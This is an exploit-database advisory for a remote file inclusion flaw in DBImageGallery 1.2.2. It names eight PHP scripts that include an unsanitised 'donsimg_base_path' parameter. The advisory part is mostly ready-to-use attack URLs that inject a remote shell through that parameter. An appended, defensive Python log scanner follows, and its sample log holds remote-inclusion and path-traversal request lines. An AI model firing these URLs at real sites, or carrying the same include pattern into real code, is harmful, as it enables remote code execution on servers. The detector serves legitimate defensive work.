
DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion

Author: Denven
type: webapps
platform: php
date_added: 2007-02-20 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-34944;CVE-2007-1164;OSVDB-34943;OSVDB-34942;OSVDB-34941;OSVDB-34940;OSVDB-34939;OSVDB-34938;OSVDB-34937 
application_url: http://www.exploit-db.comDRBImageGallery.zip

DBImageGallery 1.2.2

*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:

admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path



**************************************************************************************
RFI:

http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]


**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]
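
Added example (not part of the original advisory or of DBImageGallery): a log check that flags requests setting donsimg_base_path on any of the eight scripts listed above. It assumes common/combined-format access logs and that no legitimate client ever sends this parameter; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

# Script paths and parameter name are taken from the advisory above.
SCRIPTS = (
    "admin/attributes.php", "admin/images.php", "admin/scan.php",
    "includes/attributes.php", "includes/db_utils.php", "includes/images.php",
    "includes/utils.php", "includes/values.php",
)
PARAM = "donsimg_base_path"

# Client, method, request target and status of a common/combined log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# A value that begins with a URL scheme refers to something other than a local path.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]+:', re.I)

def inspect_line(line):
    """Return a finding dict if the request sets PARAM on a listed script, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)  # decode %2E and similar before matching the path
    script = next((s for s in SCRIPTS if "/" + s in path), None)
    if script is None:
        return None
    # parse_qsl percent-decodes names too, so donsimg%5Fbase%5Fpath still matches.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True) if k == PARAM]
    if not values:
        return None
    return {"client": client, "method": method, "script": script,
            "status": int(status), "values": values,
            "remote": any(SCHEME_RE.match(v) for v in values)}

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample entries (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2007:10:00:00 +0000] "GET /gallery/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Feb/2007:10:00:05 +0000] "GET /gallery/admin/scan.php?donsimg_base_path=http://remote.example/file.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Feb/2007:10:00:09 +0000] "GET /gallery/includes/utils.php?donsimg%5Fbase%5Fpath=..%2F HTTP/1.0" 200 0',
    '192.0.2.10 - - [21/Feb/2007:10:01:00 +0000] "GET /gallery/admin/images.php?page=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An access log records only the query string, so a value sent in a POST body or cookie will not show up in this check.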